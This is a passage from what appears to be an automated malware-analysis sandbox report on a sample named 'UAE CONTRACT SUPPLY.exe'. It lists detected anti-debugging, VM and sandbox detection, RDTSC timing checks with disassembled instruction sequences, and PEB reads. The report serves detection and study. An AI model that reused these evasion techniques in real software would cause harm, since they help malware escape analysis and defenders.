Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFBB58 push ebp; iretd		16_2_00CFBB59
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CEC308 push ds; iretd		16_2_00CEC309
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFBCB2 push cs; iretd		16_2_00CFBCB3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFB45C push eax; ret		16_2_00CFB462
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFB5BB push ebp; ret		16_2_00CFBA3E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CF4EAE push eax; iretd		16_2_00CF4EB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00CFBEAB push ecx; iretd		16_2_00CFBEAC

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226054E EnumWindows,NtSetInformationThread,		1_2_0226054E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022652C8 NtSetInformationThread,		1_2_022652C8
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_005652C8		3_2_005652C8

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000002260457 second address: 0000000002260457 instructions:
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 00000000022652A9 second address: 00000000022652A9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F29049E4728h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, dx 0x00000020 test ah, ah 0x00000022 add edi, edx 0x00000024 cmp dl, bl 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007F29049E46FEh 0x00000035 cmp dx, 3BF6h 0x0000003a cmp dl, dl 0x0000003c call 00007F29049E477Ah 0x00000041 call 00007F29049E4738h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000002265176 second address: 0000000002265176 instructions:
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000002265B0F second address: 0000000002265B0F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFE8h 0x0000000d jne 00007F29049E3212h 0x0000000f test bh, FFFFFFD2h 0x00000012 cmp bl, bl 0x00000014 cmp byte ptr [ebx], FFFFFFB8h 0x00000017 jne 00007F29049E31E8h 0x00000019 cmp ecx, 00002000h 0x0000001f jne 00007F29049E30D5h 0x00000025 inc ecx 0x00000026 inc ebx 0x00000027 test ch, ch 0x00000029 cmp dword ptr [ebx], 9090C350h 0x0000002f jne 00007F29049E31D6h 0x00000031 jmp 00007F29049E31E2h 0x00000033 test cx, dx 0x00000036 cmp edx, dword ptr [ebx] 0x00000038 jne 00007F29049E31CEh 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000000564E71 second address: 0000000000564E71 instructions:

Tries to detect Any.run

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, UAE CONTRACT SUPPLY.exe, 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE9
Source: UAE CONTRACT SUPPLY.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000002262D1F second address: 0000000002262D1F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, ebx 0x0000000d mov ecx, 00001000h 0x00000012 cmp ebx, eax 0x00000014 div ecx 0x00000016 cmp edx, 00000000h 0x00000019 jne 00007F29049E46E2h 0x0000001b dec ebx 0x0000001c xor edx, edx 0x0000001e jmp 00007F29049E473Eh 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000002260457 second address: 0000000002260457 instructions:
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 00000000022652A9 second address: 00000000022652A9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F29049E4728h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, dx 0x00000020 test ah, ah 0x00000022 add edi, edx 0x00000024 cmp dl, bl 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007F29049E46FEh 0x00000035 cmp dx, 3BF6h 0x0000003a cmp dl, dl 0x0000003c call 00007F29049E477Ah 0x00000041 call 00007F29049E4738h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 00000000022652F2 second address: 00000000022652F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F29049E3695h 0x0000001d popad 0x0000001e call 00007F29049E32E0h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000002265176 second address: 0000000002265176 instructions:
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000002265B0F second address: 0000000002265B0F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFE8h 0x0000000d jne 00007F29049E3212h 0x0000000f test bh, FFFFFFD2h 0x00000012 cmp bl, bl 0x00000014 cmp byte ptr [ebx], FFFFFFB8h 0x00000017 jne 00007F29049E31E8h 0x00000019 cmp ecx, 00002000h 0x0000001f jne 00007F29049E30D5h 0x00000025 inc ecx 0x00000026 inc ebx 0x00000027 test ch, ch 0x00000029 cmp dword ptr [ebx], 9090C350h 0x0000002f jne 00007F29049E31D6h 0x00000031 jmp 00007F29049E31E2h 0x00000033 test cx, dx 0x00000036 cmp edx, dword ptr [ebx] 0x00000038 jne 00007F29049E31CEh 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000000562D1F second address: 0000000000562D1F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, ebx 0x0000000d mov ecx, 00001000h 0x00000012 cmp ebx, eax 0x00000014 div ecx 0x00000016 cmp edx, 00000000h 0x00000019 jne 00007F29049E46E2h 0x0000001b dec ebx 0x0000001c xor edx, edx 0x0000001e jmp 00007F29049E473Eh 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 00000000005652F2 second address: 00000000005652F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F29049E3695h 0x0000001d popad 0x0000001e call 00007F29049E32E0h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 0000000000564E71 second address: 0000000000564E71 instructions:
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000000CE85E4 second address: 0000000000CE85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000000CE896E second address: 0000000000CE8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Code function: 1_2_022608D0 rdtsc

1_2_022608D0

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 0000000D.00000000.499784826.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000D.00000000.499829502.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, UAE CONTRACT SUPPLY.exe, 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe9
Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000D.00000002.649228259.000000000641C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.499784826.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000D.00000002.649228259.000000000641C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000002.648636841.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 0000000D.00000000.499476016.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: UAE CONTRACT SUPPLY.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000D.00000000.499476016.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000000D.00000000.499829502.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Queries a list of all running processes

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Code function: 1_2_0226054E NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000

1_2_0226054E

Hides threads from debuggers

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Thread information set: HideFromDebugger			Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Code function: 1_2_022608D0 rdtsc

1_2_022608D0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Code function: 1_2_02263A1C LdrInitializeThunk,

1_2_02263A1C

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02264B16 mov eax, dword ptr fs:[00000030h]		1_2_02264B16
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02264FBF mov eax, dword ptr fs:[00000030h]		1_2_02264FBF
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226206F mov eax, dword ptr fs:[00000030h]		1_2_0226206F
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02262078 mov eax, dword ptr fs:[00000030h]		1_2_02262078
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022658C3 mov eax, dword ptr fs:[00000030h]		1_2_022658C3
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02262CDC mov eax, dword ptr fs:[00000030h]		1_2_02262CDC
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022658DB mov eax, dword ptr fs:[00000030h]		1_2_022658DB
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022619AF mov eax, dword ptr fs:[00000030h]		1_2_022619AF
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]		3_2_1E4D7E41
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]		3_2_1E4D7E41
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]		3_2_1E4D7E41
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]		3_2_1E4D7E41
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]		3_2_1E4D7E41
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]		3_2_1E4D7E41
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58AE44 mov eax, dword ptr fs:[00000030h]		3_2_1E58AE44
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58AE44 mov eax, dword ptr fs:[00000030h]		3_2_1E58AE44
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D766D mov eax, dword ptr fs:[00000030h]		3_2_1E4D766D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]		3_2_1E4EAE73
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]		3_2_1E4EAE73
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]		3_2_1E4EAE73
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]		3_2_1E4EAE73
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]		3_2_1E4EAE73
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]		3_2_1E4CC600
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]		3_2_1E4CC600
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]		3_2_1E4CC600
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F8E00 mov eax, dword ptr fs:[00000030h]		3_2_1E4F8E00
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581608 mov eax, dword ptr fs:[00000030h]		3_2_1E581608
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FA61C mov eax, dword ptr fs:[00000030h]		3_2_1E4FA61C
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FA61C mov eax, dword ptr fs:[00000030h]		3_2_1E4FA61C
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E57FE3F mov eax, dword ptr fs:[00000030h]		3_2_1E57FE3F
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CE620 mov eax, dword ptr fs:[00000030h]		3_2_1E4CE620
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F36CC mov eax, dword ptr fs:[00000030h]		3_2_1E4F36CC
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E598ED6 mov eax, dword ptr fs:[00000030h]		3_2_1E598ED6
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E57FEC0 mov eax, dword ptr fs:[00000030h]		3_2_1E57FEC0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E508EC7 mov eax, dword ptr fs:[00000030h]		3_2_1E508EC7
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F16E0 mov ecx, dword ptr fs:[00000030h]		3_2_1E4F16E0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D76E2 mov eax, dword ptr fs:[00000030h]		3_2_1E4D76E2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55FE87 mov eax, dword ptr fs:[00000030h]		3_2_1E55FE87
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5446A7 mov eax, dword ptr fs:[00000030h]		3_2_1E5446A7
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]		3_2_1E590EA5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]		3_2_1E590EA5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]		3_2_1E590EA5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DEF40 mov eax, dword ptr fs:[00000030h]		3_2_1E4DEF40
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DFF60 mov eax, dword ptr fs:[00000030h]		3_2_1E4DFF60
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E598F6A mov eax, dword ptr fs:[00000030h]		3_2_1E598F6A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FA70E mov eax, dword ptr fs:[00000030h]		3_2_1E4FA70E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FA70E mov eax, dword ptr fs:[00000030h]		3_2_1E4FA70E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55FF10 mov eax, dword ptr fs:[00000030h]		3_2_1E55FF10
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55FF10 mov eax, dword ptr fs:[00000030h]		3_2_1E55FF10
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E59070D mov eax, dword ptr fs:[00000030h]		3_2_1E59070D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E59070D mov eax, dword ptr fs:[00000030h]		3_2_1E59070D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EF716 mov eax, dword ptr fs:[00000030h]		3_2_1E4EF716
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C4F2E mov eax, dword ptr fs:[00000030h]		3_2_1E4C4F2E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C4F2E mov eax, dword ptr fs:[00000030h]		3_2_1E4C4F2E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FE730 mov eax, dword ptr fs:[00000030h]		3_2_1E4FE730
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5037F5 mov eax, dword ptr fs:[00000030h]		3_2_1E5037F5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]		3_2_1E547794
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]		3_2_1E547794
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E547794 mov eax, dword ptr fs:[00000030h]		3_2_1E547794
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D8794 mov eax, dword ptr fs:[00000030h]		3_2_1E4D8794
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FA44B mov eax, dword ptr fs:[00000030h]		3_2_1E4FA44B
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55C450 mov eax, dword ptr fs:[00000030h]		3_2_1E55C450
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55C450 mov eax, dword ptr fs:[00000030h]		3_2_1E55C450
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E746D mov eax, dword ptr fs:[00000030h]		3_2_1E4E746D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]		3_2_1E59740D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]		3_2_1E59740D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E59740D mov eax, dword ptr fs:[00000030h]		3_2_1E59740D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
